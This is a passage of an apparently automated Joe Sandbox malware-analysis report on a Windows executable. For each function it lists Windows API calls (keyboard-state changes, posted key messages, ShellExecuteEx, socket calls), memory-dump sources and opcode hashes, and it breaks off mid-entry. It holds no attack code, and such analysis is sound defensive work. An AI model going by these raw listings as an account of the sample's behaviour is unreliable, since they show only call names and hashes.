                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: IconLoad
                                                                              • String ID: blank$info$question$stop$warning
                                                                              • API String ID: 2457776203-404129466
                                                                              • Opcode ID: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
                                                                              • Instruction ID: 1734436af2ca56e59899cd3bdf017f39c547290e8d4403808a282f24c331c6a5
                                                                              • Opcode Fuzzy Hash: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
                                                                              • Instruction Fuzzy Hash: F211F631348386BAE7249E55DC42DAF679C9F15365B20002FF90066281FAFC5E4956AE
                                                                              Function 004642F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00464312
                                                                              • LoadStringW.USER32(00000000), ref: 00464319
                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0046432F
                                                                              • LoadStringW.USER32(00000000), ref: 00464336
                                                                              • _wprintf.LIBCMT ref: 0046435C
                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0046437A
                                                                              Strings
                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 00464357
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: HandleLoadModuleString$Message_wprintf
                                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                                              • API String ID: 3648134473-3128320259
                                                                              • Opcode ID: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
                                                                              • Instruction ID: 8e316eae760c98dab52acacd6546c6ae495e9062239688ff7a3f09ebd5f77a5e
                                                                              • Opcode Fuzzy Hash: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
                                                                              • Instruction Fuzzy Hash: CB0167F2900208BFD751AB90DD89EFB776CEB08301F5009B6BB45E2151FA785E894B79
                                                                              Function 0048D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                              • GetSystemMetrics.USER32(0000000F), ref: 0048D47C
                                                                              • GetSystemMetrics.USER32(0000000F), ref: 0048D49C
                                                                              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0048D6D7
                                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0048D6F5
                                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0048D716
                                                                              • ShowWindow.USER32(00000003,00000000), ref: 0048D735
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0048D75A
                                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 0048D77D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                              • String ID:
                                                                              • API String ID: 1211466189-0
                                                                              • Opcode ID: d3703f674391628daf823e2a44e71b595811e89c5d6afcb3d767f65da08f560a
                                                                              • Instruction ID: 2f618d94a1d43a989375790be64f9a6bb81cc316bd664b93e4dd4f842dd9a18d
                                                                              • Opcode Fuzzy Hash: d3703f674391628daf823e2a44e71b595811e89c5d6afcb3d767f65da08f560a
                                                                              • Instruction Fuzzy Hash: 2EB1AE71901219EFDF14EF68C9857AE7BB1BF04701F08847AEC48AB295E738A950CB54
                                                                              Function 00402A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 00402ACF
                                                                              • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00402B17
                                                                              • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C21A
                                                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C286
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ShowWindow
                                                                              • String ID:
                                                                              • API String ID: 1268545403-0
                                                                              • Opcode ID: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
                                                                              • Instruction ID: 9bc26204a44dec3219c5fdbddb2daa96843464872a345c1f9b74dd9d2987fb79
                                                                              • Opcode Fuzzy Hash: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
                                                                              • Instruction Fuzzy Hash: 514111307046809ADF755B298ECCB6F7791AB45304F14887FE047B26E0CABDA846DB2D
                                                                              Function 004670C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 004670DD
                                                                                • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                                                • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00467114
                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00467130
                                                                              • _memmove.LIBCMT ref: 0046717E
                                                                              • _memmove.LIBCMT ref: 0046719B
                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 004671AA
                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004671BF
                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 004671DE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                              • String ID:
                                                                              • API String ID: 256516436-0
                                                                              • Opcode ID: 609405328aa4ce0b7a12a462d247550d69e5a4af05b279600444d458d52aac7c
                                                                              • Instruction ID: 188a4d0b29229593a2b146342a062b1bd5409cf6fda6c026f11dbcde1a99e618
                                                                              • Opcode Fuzzy Hash: 609405328aa4ce0b7a12a462d247550d69e5a4af05b279600444d458d52aac7c
                                                                              • Instruction Fuzzy Hash: F131A131A00215EBCF00DFA5DC85AAFB7B8EF45714F1441BAF9049B246EB349E14CBA9
                                                                              Function 004861D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DeleteObject.GDI32(00000000), ref: 004861EB
                                                                              • GetDC.USER32(00000000), ref: 004861F3
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004861FE
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0048620A
                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00486246
                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00486257
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0048902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00486291
                                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004862B1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                              • String ID:
                                                                              • API String ID: 3864802216-0
                                                                              • Opcode ID: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
                                                                              • Instruction ID: f4278305449edce2f76c410d332ec57268d6ee35a6a277c822a0a6189647fcfb
                                                                              • Opcode Fuzzy Hash: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
                                                                              • Instruction Fuzzy Hash: 46317172101210BFEB115F50DC4AFEB3BADEF49755F0540A9FE08AA291D6759C41CB68
                                                                              Function 0046EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                                              • _wcstok.LIBCMT ref: 0046EC94
                                                                              • _wcscpy.LIBCMT ref: 0046ED23
                                                                              • _memset.LIBCMT ref: 0046ED56
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                              • String ID: X
                                                                              • API String ID: 774024439-3081909835
                                                                              • Opcode ID: 53d97517bb1528210d25025e3a9ae5f237a94a3c452e6ba6f934f7bd0169bade
                                                                              • Instruction ID: da02439699827519884de0a837ef4d7055a253f99ddb834d536b4edba3b8eab3
                                                                              • Opcode Fuzzy Hash: 53d97517bb1528210d25025e3a9ae5f237a94a3c452e6ba6f934f7bd0169bade
                                                                              • Instruction Fuzzy Hash: E1C161756083019FD714EF25D841A5AB7E4FF85318F10492EF899A72A2EB38EC45CB4B
                                                                              Function 00476B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00476C00
                                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00476C21
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00476C34
                                                                              • htons.WSOCK32(?,?,?,00000000,?), ref: 00476CEA
                                                                              • inet_ntoa.WSOCK32(?), ref: 00476CA7
                                                                                • Part of subcall function 0045A7E9: _strlen.LIBCMT ref: 0045A7F3
                                                                                • Part of subcall function 0045A7E9: _memmove.LIBCMT ref: 0045A815
                                                                              • _strlen.LIBCMT ref: 00476D44
                                                                              • _memmove.LIBCMT ref: 00476DAD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                              • String ID:
                                                                              • API String ID: 3619996494-0
                                                                              • Opcode ID: f19ece50d4675aab4e1eaa4d24be22d7200485f06fda092768c3de9a5a065b8e
                                                                              • Instruction ID: ed0775ecea4f9d6c11d03e52ad69743ddbee2f845c96f8b55ead14f2c665c5c3
                                                                              • Opcode Fuzzy Hash: f19ece50d4675aab4e1eaa4d24be22d7200485f06fda092768c3de9a5a065b8e
                                                                              • Instruction Fuzzy Hash: 3081E971204700AFC710EB25CC81EABB7A9EF84718F10892EF559A72D2DB78ED05CB59
                                                                              Function 00401424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
                                                                              • Instruction ID: a887e684d243743618d1057532b585a7ad503945d0d011121e70032f0d2e3d72
                                                                              • Opcode Fuzzy Hash: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
                                                                              • Instruction Fuzzy Hash: 85715F30900109EFDB04DF95CC89EBF7B75FF85314F14816AF915AA2A1C738AA51CBA9
                                                                              Function 0048B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsWindow.USER32(00A5C970), ref: 0048B3EB
                                                                              • IsWindowEnabled.USER32(00A5C970), ref: 0048B3F7
                                                                              • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0048B4DB
                                                                              • SendMessageW.USER32(00A5C970,000000B0,?,?), ref: 0048B512
                                                                              • IsDlgButtonChecked.USER32(?,?), ref: 0048B54F
                                                                              • GetWindowLongW.USER32(00A5C970,000000EC), ref: 0048B571
                                                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0048B589
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                              • String ID:
                                                                              • API String ID: 4072528602-0
                                                                              • Opcode ID: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
                                                                              • Instruction ID: 3cfba568ea5790526d5b286793119b4d477072028a14d6832b16bbf893ccb4d1
                                                                              • Opcode Fuzzy Hash: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
                                                                              • Instruction Fuzzy Hash: 9B71BF34601604EFDB21AF54CC95FBF7BA9EF09700F14486EE941973A2C739A891DB98
                                                                              Function 0047F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0047F448
                                                                              • _memset.LIBCMT ref: 0047F511
                                                                              • ShellExecuteExW.SHELL32(?), ref: 0047F556
                                                                                • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                                              • GetProcessId.KERNEL32(00000000), ref: 0047F5CD
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0047F5FC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                              • String ID: @
                                                                              • API String ID: 3522835683-2766056989
                                                                              • Opcode ID: bc3d410e87ac89b06d51cd0e3322e6ce41cf3a0caf3fdd3db083c5eeea97c555
                                                                              • Instruction ID: 5c1dd39b7f321ddcc7bcc10d078eb251a602d9f768a890d439a18523313ae713
                                                                              • Opcode Fuzzy Hash: bc3d410e87ac89b06d51cd0e3322e6ce41cf3a0caf3fdd3db083c5eeea97c555
                                                                              • Instruction Fuzzy Hash: 3B61B1B1A006189FCB04EF55C48099EB7F5FF48314F14846EE819BB392CB38AD45CB88
                                                                              Function 00460F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetParent.USER32(?), ref: 00460F8C
                                                                              • GetKeyboardState.USER32(?), ref: 00460FA1
                                                                              • SetKeyboardState.USER32(?), ref: 00461002
                                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 00461030
                                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 0046104F
                                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00461095
                                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 004610B8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                              • String ID:
                                                                              • API String ID: 87235514-0
                                                                              • Opcode ID: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
                                                                              • Instruction ID: d8e1dc28bdc088eb6cbc7413f3b60f262c6bc769533ec748a7a92d83500406ea
                                                                              • Opcode Fuzzy Hash: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
                                                                              • Instruction Fuzzy Hash: 5F51D1A05046D53DFB3642348C15BBBBEA95B06304F0C898EE1D4959E3E2DDDCC8D75A
                                                                              Function 00460D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetParent.USER32(00000000), ref: 00460DA5
                                                                              • GetKeyboardState.USER32(?), ref: 00460DBA
                                                                              • SetKeyboardState.USER32(?), ref: 00460E1B
                                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00460E47
                                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00460E64
                                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00460EA8
                                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00460EC9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                              • String ID:
                                                                              • API String ID: 87235514-0
                                                                              • Opcode ID: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
                                                                              • Instruction ID: 69172e86244207f9b898dfa665998bef84c2b13c00b7e8d8db4e4b2c62b94f0a
                                                                              • Opcode Fuzzy Hash: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
                                                                              • Instruction Fuzzy Hash: 035136A05447D53DFB368334CC41B7B7FA95B06300F08898EE1D4569C2E39AAC88D35A
                                                                              Function 02F57B9C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,02F58311,?,00000000,?,00000000,00000000), ref: 02F57BDE
